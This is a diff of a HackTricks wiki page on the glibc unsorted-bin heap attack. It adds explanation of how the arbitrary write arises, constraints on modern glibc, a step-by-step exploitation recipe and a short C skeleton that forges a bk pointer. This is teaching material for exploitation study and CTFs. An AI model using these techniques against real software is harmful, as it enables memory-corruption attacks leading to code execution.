Merge pull request #1346 from HackTricks-wiki/research_update_src_binary-exploitation_libc-heap_unsorted-bin-attack_20250827_082545

Research Update Enhanced src/binary-exploitation/libc-heap/u...
This commit is contained in:
SirBroccoli 2025-08-28 18:02:31 +02:00 committed by GitHub
commit 5b4eb853a1

View File

@ -13,7 +13,9 @@ bins-and-memory-allocations.md
Unsorted lists are able to write the address to `unsorted_chunks (av)` in the `bk` address of the chunk. Therefore, if an attacker can **modify the address of the `bk` pointer** in a chunk inside the unsorted bin, he could be able to **write that address in an arbitrary address** which could be helpful to leak a Glibc addresses or bypass some defense.
So, basically, this attack allows to **set a big number at an arbitrary address**. This big number is an address, which could be a heap address or a Glibc address. A typical target is **`global_max_fast`** to allow to create fast bin bins with bigger sizes (and pass from an unsorted bin atack to a fast bin attack).
So, basically, this attack allows to **set a big number at an arbitrary address**. This big number is an address, which could be a heap address or a Glibc address. A traditional target was **`global_max_fast`** to allow to create fast bin bins with bigger sizes (and pass from an unsorted bin attack to a fast bin attack).
- Modern note (glibc ≥ 2.39): `global_max_fast` became an 8bit global. Blindly writing a pointer there via an unsorted-bin write will clobber adjacent libc data and will not reliably raise the fastbin limit anymore. Prefer other targets or other primitives when running against glibc 2.39+. See "Modern constraints" below and consider combining with other techniques like a [large bin attack](large-bin-attack.md) or a [fast bin attack](fast-bin-attack.md) once you have a stable primitive.
> [!TIP]
> T> aking a look to the example provided in [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle) and using 0x4000 and 0x5000 instead of 0x400 and 0x500 as chunk sizes (to avoid Tcache) it's possible to see that **nowadays** the error **`malloc(): unsorted double linked list corrupted`** is triggered.
@ -27,6 +29,62 @@ So, basically, this attack allows to **set a big number at an arbitrary address*
The code from [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin_attack/unsorted_explanation/index.html) explains it very well, although if you modify the mallocs to allocate memory big enough so don't end in a Tcache you can see that the previously mentioned error appears preventing this technique: **`malloc(): unsorted double linked list corrupted`**
### How the write actually happens
- The unsorted-bin write is triggered on `free` when the freed chunk is inserted at the head of the unsorted list.
- During insertion, the allocator performs `bck = unsorted_chunks(av); fwd = bck->fd; victim->bk = bck; victim->fd = fwd; fwd->bk = victim; bck->fd = victim;`
- If you can set `victim->bk` to `(mchunkptr)(TARGET - 0x10)` before calling `free(victim)`, the final statement will perform the write: `*(TARGET) = victim`.
- Later, when the allocator processes the unsorted bin, integrity checks will verify (among other things) that `bck->fd == victim` and `victim->fd == unsorted_chunks(av)` before unlinking. Because the insertion already wrote `victim` into `bck->fd` (our `TARGET`), these checks can be satisfied if the write succeeded.
## Modern constraints (glibc ≥ 2.33)
To use unsortedbin writes reliably on current glibc:
- Tcache interference: for sizes that fall into tcache, frees are diverted there and wont touch the unsorted bin. Either
- make requests with sizes > MAX_TCACHE_SIZE (≥ 0x410 on 64bit by default), or
- fill the corresponding tcache bin (7 entries) so that additional frees reach the global bins, or
- if the environment is controllable, disable tcache (e.g., GLIBC_TUNABLES glibc.malloc.tcache_count=0).
- Integrity checks on the unsorted list: on the next allocation path that examines the unsorted bin, glibc checks (simplified):
- `bck->fd == victim` and `victim->fd == unsorted_chunks(av)`; otherwise it aborts with `malloc(): unsorted double linked list corrupted`.
- This means the address you target must tolerate two writes: first `*(TARGET) = victim` at freetime; later, as the chunk is removed, `*(TARGET) = unsorted_chunks(av)` (the allocator rewrites `bck->fd` back to the bin head). Choose targets where simply forcing a large nonzero value is useful.
- Typical stable targets in modern exploits
- Application or global state that treats "large" values as flags/limits.
- Indirect primitives (e.g., set up for a subsequent [fast bin attack]({{#ref}}fast-bin-attack.md{{#endref}}) or to pivot a later writewhatwhere).
- Avoid `__malloc_hook`/`__free_hook` on new glibc: they were removed in 2.34. Avoid `global_max_fast` on ≥ 2.39 (see next note).
- About `global_max_fast` on recent glibc
- On glibc 2.39+, `global_max_fast` is an 8bit global. The classic trick of writing a heap pointer into it (to enlarge fastbins) no longer works cleanly and is likely to corrupt adjacent allocator state. Prefer other strategies.
## Minimal exploitation recipe (modern glibc)
Goal: achieve a single arbitrary write of a heap pointer to an arbitrary address using the unsortedbin insertion primitive, without crashing.
- Layout/grooming
- Allocate A, B, C with sizes large enough to bypass tcache (e.g., 0x5000). C prevents consolidation with the top chunk.
- Corruption
- Overflow from A into Bs chunk header to set `B->bk = (mchunkptr)(TARGET - 0x10)`.
- Trigger
- `free(B)`. At insertion time the allocator executes `bck->fd = B`, therefore `*(TARGET) = B`.
- Continuation
- If you plan to continue allocating and the program uses the unsorted bin, expect the allocator to later set `*(TARGET) = unsorted_chunks(av)`. Both values are typically large and may be enough to change size/limit semantics in targets that only check for "big".
Pseudocode skeleton:
```c
// 64-bit glibc 2.352.38 style layout (tcache bypass via large sizes)
void *A = malloc(0x5000);
void *B = malloc(0x5000);
void *C = malloc(0x5000); // guard
// overflow from A into Bs metadata (prev_size/size/.../bk). You must control B->bk.
*(size_t *)((char*)B - 0x8) = (size_t)(TARGET - 0x10); // write fake bk
free(B); // triggers *(TARGET) = B (unsorted-bin insertion write)
```
> [!NOTE]
> • If you cannot bypass tcache with size, fill the tcache bin for the chosen size (7 frees) before freeing the corrupted chunk so the free goes to unsorted.
> • If the program immediately aborts on the next allocation due to unsorted-bin checks, reexamine that `victim->fd` still equals the bin head and that your `TARGET` holds the exact `victim` pointer after the first write.
## Unsorted Bin Infoleak Attack
This is actually a very basic concept. The chunks in the unsorted bin are going to have pointers. The first chunk in the unsorted bin will actually have the **`fd`** and the **`bk`** links **pointing to a part of the main arena (Glibc)**.\
@ -71,6 +129,10 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n
- Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits).
- Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`.
## References
- Glibc malloc unsorted-bin integrity checks (example in 2.33 source): https://elixir.bootlin.com/glibc/glibc-2.33/source/malloc/malloc.c
- `global_max_fast` and related definitions in modern glibc (2.39): https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c
{{#include ../../banners/hacktricks-training.md}}